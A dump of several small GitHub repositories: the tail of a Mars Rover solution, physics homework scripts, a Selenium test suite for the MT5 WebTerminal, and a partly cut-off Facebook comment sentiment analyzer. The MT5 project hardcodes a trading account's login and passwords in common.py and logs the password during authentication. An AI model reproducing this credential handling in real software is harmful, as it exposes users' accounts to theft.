[\"L\", \"R\", \"M\"] e.g. LMLMLMLMRRM. ' +\n 'L=Left, R=Right, M=Move. Please try again!\\n'\n )\n\n def get_instruction(self) -> str:\n \"\"\"\n function to return navigation instruction\n :return: navigation instruction string\n \"\"\"\n return self.__rover_instruction\n\n def _new_orientation(self, current_orientation, navigate_to) -> str:\n \"\"\"\n function to find the new orientation after 90 degrees left or right spin\n :param current_orientation: current orientation of the Rover\n :param navigate_to: spin 90 to left or right\n :return: desired orientation of the Rover\n \"\"\"\n # spin 90 degrees to left\n if navigate_to == 'L':\n # used mod to return to end of the orientation array after the pointer reached to head\n return self.__orientations[(self.__orientations.index(current_orientation) - 1) % 4]\n # spin 90 degrees to right\n else:\n # used mod to return to head of the orientation array after the pointer reached to end\n return self.__orientations[(self.__orientations.index(current_orientation) + 1) % 4]\n\n def _move(self, orientation, x, y) -> tuple:\n \"\"\"\n function to move Rover to desired location\n :param orientation: current facing of the Rover\n :param x: current x coordinate of the Rover\n :param y: current y coordinate of the Rover\n :return: new x and y coordinates or no change if hit the Plateau boundaries\n \"\"\"\n # if the Rover is facing North and it didn't hit the Plateau upper right y coordinate\n if orientation == 'N' and y < self.__plateau_upper_right_y:\n return x, y + 1\n # if the Rover is facing South and it didn't hit the Plateau bottom left y coordinate\n elif orientation == 'S' and y > self.__plateau_bottom_left_y:\n return x, y - 1\n # if the Rover is facing East and it didn't hit the Plateau upper right x coordinate\n elif orientation == 'E' and x < self.__plateau_upper_right_x:\n return x + 1, y\n # if the Rover is facing West and Rover didn't hit the Plateau bottom left x coordinate\n elif orientation == 'W' and x > self.__plateau_bottom_left_x:\n return x - 1, y\n return x, y\n\n def apply_instructions(self) -> tuple:\n \"\"\"\n apply instruction to the Rover\n :return: the Rover final x and y and also its orientation -> x coordinate, y coordinate, orientation\n \"\"\"\n for instruction in self.__rover_instruction:\n if instruction == 'M':\n self.__rover_x, self.__rover_y = self._move(self.__rover_orientation, self.__rover_x, self.__rover_y)\n else:\n self.__rover_orientation = 
self._new_orientation(self.__rover_orientation, instruction)\n return self.__rover_x, self.__rover_y, self.__rover_orientation\n\n\ndef get_input() -> list:\n \"\"\"\n function to get input data either from command line or file\n :return: array of input data\n \"\"\"\n if len(sys.argv) != 2:\n raise ValueError('Missing input data. To run: python mars_rover.py <arg1>. arg1 is a file or input data')\n\n # read the Plateau and Rover data from file if file exists otherwise read the input from command line\n if os.path.isfile(sys.argv[1]):\n with open(sys.argv[1], 'r') as input_file:\n plateau_rover_data = [line.strip().split(':')[1] for line in input_file.readlines() if line.strip()]\n else:\n plateau_rover_data = [line.strip().split(':')[1] for line in sys.argv[1].split('\\n') if line.strip()]\n\n # reverse the plateau_rover_data array to be able to use pop() function\n plateau_rover_data.reverse()\n\n return plateau_rover_data\n\n\ndef run_mars_rover(plateau_rover_data):\n \"\"\"\n function to read rovers' data and apply the instruction\n assumptions:\n - one Rover can move at a time and finishes its instructions and then next Rover starts its instructions.\n - collision is acceptable which means if Rover1 is in 1,3 grid, Rover2 can come to the same grid or pass\n the grid.\n possible scenarios that we can change the above behavior:\n - Rovers can move at the same time.\n - each Rover moves once at a time and then the next Rover moves\n - apply one instruction at a time for a Rover then apply one instruction for the next Rover\n possible changes for above scenarios\n - If collision is acceptable, there won't be any changes in the main Rover class functions however\n ``apply_instructions`` function needs to be updated in order to apply instruction in the desired format.\n - If collision is NOT acceptable, there needs to be a change in Rover class especially ``move`` function\n to prevent collision or in some scenarios a Rover can be blocked completely if there is already another\n Rover in a grid that the other Rover wants to surfs. Also there needs to be a change in\n ``apply_instructions`` like above.\n\n :param plateau_rover_data: input data\n \"\"\"\n\n results = []\n\n # set Plateau coordinates - get the first element from plateau_rover_data which is plateau coordinates\n plateau = Plateau()\n plateau.set_upper_coordinates(plateau_rover_data.pop())\n plateau_coordinates = plateau.get_coordinates()\n\n # for loop to run for each Rover. For each Rover, there is two lines of input hence divide by 2\n for i in range(0, int(len(plateau_rover_data) / 2)):\n rover = Rover()\n rover.set_plateau_coordinates(plateau_coordinates)\n rover.set_landing(plateau_rover_data.pop())\n rover.set_instructions(plateau_rover_data.pop())\n rover_x, rover_y, rover_orientation = rover.apply_instructions()\n results.append(\n 'Rover{i}:{x} {y} {orientation}'.format(i=i + 1, x=rover_x, y=rover_y, orientation=rover_orientation)\n )\n return results\n\n\nif __name__ == '__main__':\n\n try:\n res = run_mars_rover(get_input())\n print(*res, sep=\"\\n\")\n except Exception as e:\n raise\n" } ]
3
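The `Rover._new_orientation` method in the record above turns 90-degree spins into index arithmetic over `['N', 'E', 'S', 'W']`, using `% 4` to wrap around at both ends. A standalone illustration of just that trick:
```
# The mod-4 wrap-around used by Rover._new_orientation in mars_rover.py.
ORIENTATIONS = ['N', 'E', 'S', 'W']

def spin(orientation, direction):
    step = -1 if direction == 'L' else 1
    return ORIENTATIONS[(ORIENTATIONS.index(orientation) + step) % 4]

assert spin('N', 'L') == 'W'  # -1 % 4 == 3: wraps from the head to the tail
assert spin('W', 'R') == 'N'  # 4 % 4 == 0: wraps from the tail to the head
assert spin('E', 'L') == 'N'
print("all spins ok")
```
Python's modulo of a negative number is non-negative, which is what makes the single `% 4` expression cover both the left and right wrap cases.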
angelo6792/PHSX815_Week8
https://github.com/angelo6792/PHSX815_Week8
12296ef37e6c8808b0598d300359d43333ab1d66
e1134316eb9222882c62e5c2a87ab117791851e5
56f9d0cd4e0139bafd13ed44ffe136f0ce7d0e46
refs/heads/main
2023-03-28T23:43:20.415358
2021-03-29T00:12:55
2021-03-29T00:12:55
351,286,866
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7018348574638367, "alphanum_fraction": 0.7201834917068481, "avg_line_length": 16.440000534057617, "blob_id": "10605fdd7ccf900f398e3780526112b61f682e8b", "content_id": "8a97eb72ae4564370b7d2681acb5fd44a5f8fbd7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 436, "license_type": "no_license", "max_line_length": 49, "num_lines": 25, "path": "/HW9python/Minimize.py", "repo_name": "angelo6792/PHSX815_Week8", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n# imports of external packages to use in our code\nimport sys\nimport numpy as np\nimport math\nimport sympy as sp\nfrom sympy import Symbol, integrate, exp, oo\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\n\n#create array for funtion\nxx = np.linspace(-1,1)\n\n#random function\ndef f(x):\n return 8*x**4 - 4*x**2 + 3*x\n\n\nplt.plot(xx,f(xx))\nplt.show()\n\n\n#minimize function\nprint(minimize(f,[-1]))\n" }, { "alpha_fraction": 0.6006144285202026, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 15.692307472229004, "blob_id": "0725faf44984cc156e0ad4adc5a083e22ef6432c", "content_id": "8a716641fc560be96b0af418abf93c0925cb6b7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "no_license", "max_line_length": 52, "num_lines": 39, "path": "/python/Rayleigh.py", "repo_name": "angelo6792/PHSX815_Week8", "src_encoding": "UTF-8", "text": "import numpy as np\nimport scipy.stats\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nfrom numpy import random\n\n\n\n# Creating dataset\nx1 = [-10,10]\n\n\nNmeas = 1\nNexp = 1000\n\nmu_experiment = 0\nmu_truearr = []\nmu_bestarr = []\nsigma = 2\n\nfor i in range(-100,100):\n mu_true = i//10\n\n for e in range(0,Nexp):\n mu_best = 0\n\n for m in range(0,Nmeas):\n z = float(random.normal(mu_true, sigma))\n mu_best += z\n\nnp.true_divide(mu_true, Nexp)\nmu_bestarr.append(mu_best)\nmu_truearr.append(mu_true)\n\n\nplt.hist2d(mu_truearr,mu_bestarr, bins = 20)\nplt.hist(x1, bins =20)\n#plt.fill(mu_truearr,mu_bestarr)\nplt.show()\n" } ]
2
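`Minimize.py` in the record above minimizes f(x) = 8x^4 - 4x^2 + 3x from the single start point x0 = -1. A hedged cross-check — `minimize_scalar` and the bracket values are my additions, not part of the repo — confirming the minimizer with a second method and the first-order condition f'(x) ≈ 0:
```
from scipy.optimize import minimize, minimize_scalar

def f(x):
    return 8 * x**4 - 4 * x**2 + 3 * x

def fprime(x):
    # analytic derivative of f
    return 32 * x**3 - 8 * x + 3

res = minimize(f, [-1.0])                                  # as in Minimize.py
res_scalar = minimize_scalar(f, bracket=(-2.0, 0.0, 2.0))  # assumed bracket

print(res.x, res_scalar.x)        # both should land near the same minimizer
print(abs(fprime(res_scalar.x)))  # first-order condition: ~0 at the minimum
```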
berpress/MT5WT
https://github.com/berpress/MT5WT
674e14ee8797a5c0e1560c6c82438d4c15464fb0
10826f974cd5aef14e8771e18ca0314f27a902e3
79fb040ce8977ae233fb09152d9fb00419f82706
refs/heads/master
2023-08-04T11:28:38.949923
2019-12-08T08:50:20
2019-12-08T08:50:20
215,619,070
0
0
Apache-2.0
2019-10-16T18:39:46
2019-12-08T08:50:46
2023-07-25T16:56:18
Python
[ { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6865671873092651, "avg_line_length": 15, "blob_id": "d29f21518a4eda8a3a9bd55af5694b4ea5c7776d", "content_id": "6e8503624bed4622d61d92e0e09985a2709aa510", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 335, "license_type": "permissive", "max_line_length": 31, "num_lines": 21, "path": "/tox.ini", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[tox]\nenvlist = py3\nskipsdist = True\n\n[testenv]\ncommands =\n flake8 ./tests\n flake8 ./fixture\n flake8 ./locators\n flake8 ./common\n\n[pytest]\naddopts = -v\ntestpaths = tests\n\n[flake8]\nmax-line-length = 79\nignore = D203, D101, W503, C901\nexclude = .git,__pycache__,venv\napplication-import-names = api\nimport-order-style = google" }, { "alpha_fraction": 0.8108108043670654, "alphanum_fraction": 0.837837815284729, "avg_line_length": 18, "blob_id": "6252d6e51cacd814f8ea939a212883ed872205ca", "content_id": "0b30336213ecfee4213d411739eb132a23df7619", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "permissive", "max_line_length": 26, "num_lines": 2, "path": "/doc/TEST_CASES.md", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "Тест кейсы\n1. Авторизация в терминале" }, { "alpha_fraction": 0.718120813369751, "alphanum_fraction": 0.7516778707504272, "avg_line_length": 36.25, "blob_id": "374e15d844d6ef07b9c66d7c25953cd8c4380270", "content_id": "2b82d64a4e64330ed4488d8f80468e6e6a1de550", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "permissive", "max_line_length": 80, "num_lines": 8, "path": "/common/common.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from collections import namedtuple\n\nAccount = namedtuple(\"Account\", \"trading_type login password investor_password\")\nSymbol = namedtuple(\"Symbol\", \"symbol_type symbol_name\")\n\n\nNETTING_ACCOUNT = Account(\"netting\", \"22722541\", \"hz8phdia\", \"livjdf2b\")\nNETTING_SYMBOLS = Symbol(\"instant_ex\", \"EURUSD\")\n" }, { "alpha_fraction": 0.6796537041664124, "alphanum_fraction": 0.701298713684082, "avg_line_length": 27.875, "blob_id": "d44fd84ccd4e2865813ed20f5451bfe40c0c50d6", "content_id": "d27ef542c17928d8d2100f6c5c02e9e67a59fde6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 111, "num_lines": 16, "path": "/README.md", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "# MT5 WebTerminal\n[![Build Status](https://travis-ci.org/berpress/MT5WT.svg?branch=master)](https://travis-ci.org/berpress/MT5WT)\n\n## Autotests at selenium and python for WebTerminal МТ5 (https://trade.mql5.com/trade)\n\nHow to use:\n1. Copy project\n```\ngit clone [email protected]:berpress/MT5WT.git\n```\n2. Install poetry \n poetry - https://poetry.eustace.io/\n \n How to use poetry:\n 1. Install packeges - poetry install\n 2. 
Add a package - poetry add <package>\n" }, { "alpha_fraction": 0.6499312520027161, "alphanum_fraction": 0.6533700227737427, "avg_line_length": 31.60869598388672, "blob_id": "299e40a9cb4874de2b65b9b25c30dabeb3b58b86", "content_id": "0e0b4b05754bd1e0b0a345547f5821f95c723ea1", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1454, "license_type": "permissive", "max_line_length": 79, "num_lines": 46, "path": "/fixture/login_page.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from selenium.common.exceptions import NoSuchElementException\n\nfrom locators.login_page import Authorization\nfrom fixture._base import log\n\n\nclass LoginPage:\n    def __init__(self, app):\n        self.app = app\n\n    def open(self):\n        log.info(f\"Open {self.app.base_url}\")\n        self.app.wd.get(self.app.base_url)\n\n    def auth_terminal(self, login, password, mt5_platform=True):\n        log.info(f\"Auth in terminal, login = {login}, password = {password}\")\n        if mt5_platform:\n            self.select_mt5_platform().click()\n        self.password_input().send_keys(password)\n        self.login_input().send_keys(login)\n        self.button_login().click()\n\n    def password_input(self):\n        return self.app.wd.find_element(*Authorization.PASSWORD_INPUT)\n\n    def login_input(self):\n        return self.app.wd.find_element(*Authorization.LOGIN_INPUT)\n\n    def select_mt5_platform(self):\n        return self.app.wd.find_element(*Authorization.MT5_PLATFORM)\n\n    def button_login(self):\n        return self.app.wd.find_element(*Authorization.BTN_LOGIN)\n\n    def total_field(self):\n        return self.app.wd.find_element(*Authorization.TOTAL_FIELD)\n\n    def account_info(self):\n        return self.app.wd.find_element(*Authorization.ACCOUNT_INFO)\n\n    def is_auth(self, username):\n        try:\n            if username in self.account_info().text:\n                return True\n        except NoSuchElementException:\n            return False\n" }, { "alpha_fraction": 0.5858823657035828, "alphanum_fraction": 0.6447058916091919, "avg_line_length": 19.238094329833984, "blob_id": "5ef9d3100c1f75514593f3e7c46e3c992014ab2f", "content_id": "2b8a6b5c0e50f6ca341aa0aea8f99cace0095515", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 425, "license_type": "permissive", "max_line_length": 52, "num_lines": 21, "path": "/pyproject.toml", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[tool.poetry]\nname = \"WT_MT5\"\nversion = \"1.0\"\ndescription = \"\"\nauthors = [\"mq_old_qa\"]\n\n[tool.poetry.dependencies]\npython = \"^3.6\"\nselenium = \"^3.141\"\npytest = \"^5.3\"\nwebdrivermanager = \"^0.7.4\"\nwebdriver_manager = \"^2.3\"\npre-commit = \"^1.20\"\nflake8 = \"^3.7\"\n\n[tool.poetry.dev-dependencies]\nblack = { version = \"*\", allows-prereleases = true }\n\n[build-system]\nrequires = [\"poetry>=0.12\"]\nbuild-backend = \"poetry.masonry.api\"\n" }, { "alpha_fraction": 0.8020833134651184, "alphanum_fraction": 0.8020833134651184, "avg_line_length": 19.200000762939453, "blob_id": "4bb134afe54fa31ae9ea1510b71062097bc86fb1", "content_id": "0d61ee15897bf40f0a5f1b4383621a2d4209c39a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/fixture/_base.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import logging\n\nlogging.basicConfig(level=logging.INFO)\n\nlog = logging.getLogger(\"WebTerminal\")\n" }, { "alpha_fraction": 0.5672268867492676, 
"alphanum_fraction": 0.5714285969734192, "avg_line_length": 20.636363983154297, "blob_id": "bcb36ffc5f2938b338aa3b80c4cb69e5b3d15ca7", "content_id": "e7cfb548edc1fef4ad79ebf5b0a7d2a29fa031e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "permissive", "max_line_length": 52, "num_lines": 11, "path": "/tests/test_menu.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "# import pytest\n\n\n# class TestMenu:\n# @pytest.mark.issue(id=\"x\")\n# def test_menu_text(self, app, auth_netting):\n# pass\n#\n# @pytest.mark.issue(id=\"x\")\n# def test_menu_text_2(self, app, auth_netting):\n# pass\n" }, { "alpha_fraction": 0.6918032765388489, "alphanum_fraction": 0.6950819492340088, "avg_line_length": 24.41666603088379, "blob_id": "d72b8da7d305248637a7ad0837071f4cfa8ac439", "content_id": "2548478dd03427cbef5b511258e443c385042874", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 305, "license_type": "permissive", "max_line_length": 79, "num_lines": 12, "path": "/tests/test_login.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import pytest\n\n\nfrom common.common import NETTING_ACCOUNT\n\n\nclass TestLogin:\n @pytest.mark.issue(id=\"1\")\n def test_login(self, app):\n app.auth.open()\n app.auth.auth_terminal(NETTING_ACCOUNT.login, NETTING_ACCOUNT.password)\n assert app.auth.total_field(), \"Authorization failed\"\n" }, { "alpha_fraction": 0.6954887509346008, "alphanum_fraction": 0.6954887509346008, "avg_line_length": 30.294116973876953, "blob_id": "350821a9ea3073e2bf10287fc99c325488968ec2", "content_id": "4a68969bf6f78291996cd96e401f8ae55298208b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 532, "license_type": "permissive", "max_line_length": 59, "num_lines": 17, "path": "/fixture/application.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from fixture.login_page import LoginPage\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\n\nclass Application:\n def __init__(self, base_url):\n options: Options = Options()\n options.headless = True\n driver = ChromeDriverManager().install()\n self.wd = webdriver.Chrome(driver, options=options)\n self.auth = LoginPage(self)\n self.base_url = base_url\n\n def destroy(self):\n self.wd.quit()\n" }, { "alpha_fraction": 0.6748971343040466, "alphanum_fraction": 0.6790123581886292, "avg_line_length": 24.13793182373047, "blob_id": "5e2d0fe326d9dab8362326721b9f23e3fed334fa", "content_id": "8145be52efea74b03f5b43c1e53cd198f1584621", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 729, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/conftest.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "import pytest\nfrom common.common import NETTING_ACCOUNT\nfrom fixture.application import Application\n\n\[email protected](scope=\"session\")\ndef app(request):\n base_url = request.config.getoption(\"--base_url\")\n fixture = Application(base_url)\n fixture.wd.maximize_window()\n fixture.wd.implicitly_wait(10)\n yield fixture\n fixture.destroy()\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--base_url\",\n action=\"store\",\n 
default=\"https://trade.mql5.com/trade\",\n help=\"base_url\",\n )\n\n\[email protected]()\ndef auth_netting(app):\n if not app.auth.is_auth(NETTING_ACCOUNT.login):\n app.auth.open()\n app.auth.auth_terminal(NETTING_ACCOUNT.login, NETTING_ACCOUNT.password)\n" }, { "alpha_fraction": 0.6169772148132324, "alphanum_fraction": 0.6252588033676147, "avg_line_length": 36.153846740722656, "blob_id": "47440b46f54cf856a45bab71bc45d38b4561c2f5", "content_id": "c52ad7676284b5fdc38c4c66eddcc818a8696a34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "permissive", "max_line_length": 78, "num_lines": 13, "path": "/locators/login_page.py", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "from selenium.webdriver.common.by import By\n\n\nclass Authorization:\n LOGIN_INPUT = (By.ID, \"login\")\n PASSWORD_INPUT = (By.ID, \"password\")\n SAVE_PASSWORD_CHECKBOX = (By.ID, \"save\")\n SERVER_INPUT = (By.ID, \"server\")\n MT4_PLATFORM = (By.ID, \"mt4-platform\")\n MT5_PLATFORM = (By.ID, \"mt5-platform\")\n BTN_LOGIN = (By.XPATH, \"//button[@class='input-button' and text()='OK']\")\n TOTAL_FIELD = (By.ID, \"total\")\n ACCOUNT_INFO = (By.CLASS_NAME, \"page-text account\")\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7111111283302307, "avg_line_length": 21, "blob_id": "b953c6d7b1bee8bd7a47663de615a1c75511f9ae", "content_id": "87da065728fa9a2ae3422b829ee537cebb1e7431", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 45, "license_type": "permissive", "max_line_length": 34, "num_lines": 2, "path": "/pytest.ini", "repo_name": "berpress/MT5WT", "src_encoding": "UTF-8", "text": "[pytest]\nmarkers = issue: see doc/TEST_CASE\n\n" } ]
13
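The MT5WT fixtures above locate elements with `(By, value)` tuples unpacked into `find_element`, relying on the implicit wait configured in conftest.py. A hedged sketch of the same locator-tuple page-object pattern with an explicit wait instead — the page class, URL, and locator here are illustrative, not part of the repo:
```
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

class ExamplePage:
    # locator tuple, same shape as in locators/login_page.py
    SEARCH_INPUT = (By.NAME, "q")

    def __init__(self, driver, timeout=10):
        self.driver = driver
        self.wait = WebDriverWait(driver, timeout)

    def search_input(self):
        # explicit wait: blocks until the element is visible, then returns it
        return self.wait.until(
            EC.visibility_of_element_located(self.SEARCH_INPUT))

if __name__ == "__main__":
    driver = webdriver.Chrome()  # assumes a chromedriver is available
    driver.get("https://www.google.com")  # illustrative URL
    ExamplePage(driver).search_input().send_keys("MT5 WebTerminal")
    driver.quit()
```
Explicit waits scope the timeout to a single element and condition, which tends to be more predictable than a global implicit wait when pages load asynchronously.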
TaeMinPark/Facebook-Comments-Sentiment-Analyzer
https://github.com/TaeMinPark/Facebook-Comments-Sentiment-Analyzer
f1471db0c0d3770456a7c0d1d61c4933d476ca80
de3cacc5f35a12b6853b58880127cd14b07c8b43
1c64a4967e2ad2c3de269ca845e6c38ec5f7ca7e
refs/heads/master
2021-09-05T02:58:50.147616
2018-01-23T20:04:00
2018-01-23T20:04:00
118,661,920
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5743769407272339, "alphanum_fraction": 0.5957943797111511, "avg_line_length": 25.204082489013672, "blob_id": "e848388224d0a3449dac62aa41981a3a9aa2de7c", "content_id": "bdfd55e593e6c97831be8acf4afac10ec6b1140d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2592, "license_type": "no_license", "max_line_length": 122, "num_lines": 98, "path": "/doc2vec.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nDoc2Vec utilities.\n\nRequires pre-trained model\n\n\"\"\"\n\nfrom konlpy.tag import Twitter # To morphologic analyze\nfrom gensim.models import Doc2Vec\nimport nltk\n\n\ntwitter = Twitter()\n\n\ndef tokenize(doc):\n \"\"\"\n Tokenize document\n\n ex) 가다/동사\n :param doc: document to tokenize\n :return: tokenized document array\n \"\"\"\n return ['/'.join(twit) for twit in twitter.pos(doc, norm=True, stem=True)]\n\n\ndef load_doc2vec_model(path):\n \"\"\"\n load pre-trained doc2vec model\n :param path: path of pre-trained doc2vec model\n :return: doc2vec object\n \"\"\"\n # load train data\n return Doc2Vec.load(path)\n\n\ndef analyze_single_comment(model, tokenized_comment):\n \"\"\"\n analyze single comment if this is positive or negative.\n\n :param model: doc2vec model\n :param tokenized_comment: comment to analyze\n :return: result. '0': Negative, '1': Positive\n \"\"\"\n new_vector = model.infer_vector(tokenized_comment)\n sims = model.docvecs.most_similar([new_vector])\n return sims[0][0]\n\n\ndef analyze_comments(model, comments):\n \"\"\"\n analyze if this comments are positive or negative. And return results.\n\n :param model: doc2vec model\n :param comments: comments to analyze\n :return: result dictionary. 
ex)\n\n {\n 'positive': {'count': 3, \"most_common_words\": [('./Punctuation', 68630), ('영화/Noun', 51365), ('하다/Verb', 50281)]},\n 'negative': {'count': 2, \"most_common_words\": [('./Punctuation', 68630), ('영화/Noun', 51365), ('하다/Verb', 50281)]}\n }\n \"\"\"\n negative_words_tokens = []\n positive_words_tokens = []\n positive_count = 0\n negative_count = 0\n\n for comment in comments:\n tokenized_comment = tokenize(comment)\n result = analyze_single_comment(model, tokenized_comment)\n if result == '0':\n # negative\n negative_count += 1\n for token in tokenized_comment:\n negative_words_tokens.append(token)\n\n else:\n # positive\n positive_count += 1\n for token in tokenized_comment:\n positive_words_tokens.append(token)\n\n return {\n 'positive':\n {\n 'count': positive_count,\n 'most_common_words': nltk.Text(positive_words_tokens, name='NMSC').vocab().most_common(10)\n },\n 'negative':\n {\n 'count': negative_count,\n 'most_common_words': nltk.Text(negative_words_tokens, name='NMSC').vocab().most_common(10)\n }\n }\n" }, { "alpha_fraction": 0.6590805649757385, "alphanum_fraction": 0.6777423620223999, "avg_line_length": 27.179487228393555, "blob_id": "cf769023dc569b4b8abcc4e866d91aeeac629d7e", "content_id": "ca58403a3515678c3600e3189e88872074bb83d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 120, "num_lines": 78, "path": "/doc2vec_train.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\ntrain and save Doc2Vec model\n\n\"\"\"\n\nfrom collections import namedtuple\nfrom gensim.models import doc2vec\nfrom konlpy.tag import Twitter\nimport multiprocessing\n\ntwitter = Twitter()\nTaggedDocument = namedtuple('TaggedDocument', 'words tags') # taggeddocument to train doc2vec. (document, (pos or neg))\n\n\ndef read_data(file_name):\n \"\"\"\n read data from file\n :param file_name: name of file\n :return: array of each line. 
Each line is split by a tab.\n \"\"\"\n with open(file_name, 'r') as file_obj:\n data = [line.split('\\t') for line in file_obj.read().splitlines()]\n return data\n\n\ndef tokenize(doc):\n \"\"\"\n tokenize words\n\n :param doc: document to tokenize\n :return: tokenized array\n \"\"\"\n return ['/'.join(twit) for twit in twitter.pos(doc, norm=True, stem=True)]\n\n\ndef get_tagged_documents(data):\n \"\"\"\n tokenize and return data as TaggedDocuments, which are needed to train doc2vec.\n :param data: data to train.\n :return: tokenized TaggedDocument data\n \"\"\"\n return [TaggedDocument(tokenize(row[1]), [row[2]]) for row in data[1:]]\n\ncores = multiprocessing.cpu_count()\n\nvector_size = 300\nwindow_size = 8\ntrain_epoch = 100\nmin_count = 5\nis_dm = 1\nseed_num = 1234\niteration_count = 10\nworkers_count = cores # worker count equals the number of cores\n\n\ndata = read_data('data/ratings_train.txt')\ntagged_train_docs = get_tagged_documents(data)\n\n# doc2vec setup\nprint('doc2vec setup')\ndoc_vectorizer = doc2vec.Doc2Vec(size=vector_size, alpha=0.025, min_alpha=0.025, window=window_size,\n min_count=min_count, dm=is_dm, seed=seed_num, iter=iteration_count,\n workers=workers_count, hs=1)\ndoc_vectorizer.build_vocab(tagged_train_docs)\n\nprint('start training')\nfor epoch in range(iteration_count):\n doc_vectorizer.train(tagged_train_docs, total_examples=doc_vectorizer.corpus_count, epochs=iteration_count)\n doc_vectorizer.alpha -= 0.002\n doc_vectorizer.min_alpha = doc_vectorizer.alpha\n print('epoch' + str(epoch) + \" Finished\")\n\ndoc_vectorizer.save('models/doc2vec_dm{}.model'.format(str(is_dm))) # save model\nprint('finished.')" }, { "alpha_fraction": 0.7129186391830444, "alphanum_fraction": 0.7368420958518982, "avg_line_length": 23.22222137451172, "blob_id": "e2c2d515406b2cd4978cef0ff9f37fd4251f3abc", "content_id": "8a73e5027401d54baa0082d953ad9fbf71615343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/global_objects.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nglobal objects which are required throughout the entire program\n\nFlask application for routing and doc2vec model\n\n\"\"\"\n\nfrom flask import Flask\nfrom doc2vec import load_doc2vec_model\n\nflask_application = Flask(__name__) # flask application\nprint('loading doc2vec model')\ndoc2vec_model = load_doc2vec_model('models/doc2vec.model') # doc2vec model\nprint('loaded doc2vec model')\n" }, { "alpha_fraction": 0.6263952851295471, "alphanum_fraction": 0.6290216445922852, "avg_line_length": 28.86274528503418, "blob_id": "cffcbe817c532a5f19ffed2bd1b98c72c8c56aa7", "content_id": "657b1d13d95af5ca2f60eb86c399a75afd8ec76c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1523, "license_type": "no_license", "max_line_length": 81, "num_lines": 51, "path": "/comments.py", "repo_name": "TaeMinPark/Facebook-Comments-Sentiment-Analyzer", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Min'\n\n\"\"\"\n\nFunctions required to download comments from the Facebook Graph API.\n\nFacebook access token, post ID, and user ID of the post should be given.\n\nYou can get a token from here: https://developers.facebook.com/tools/explorer/\n\n\"\"\"\n\nimport requests\n\nGRAPH_API_VERSION = 'v2.11'\n\n\ndef 
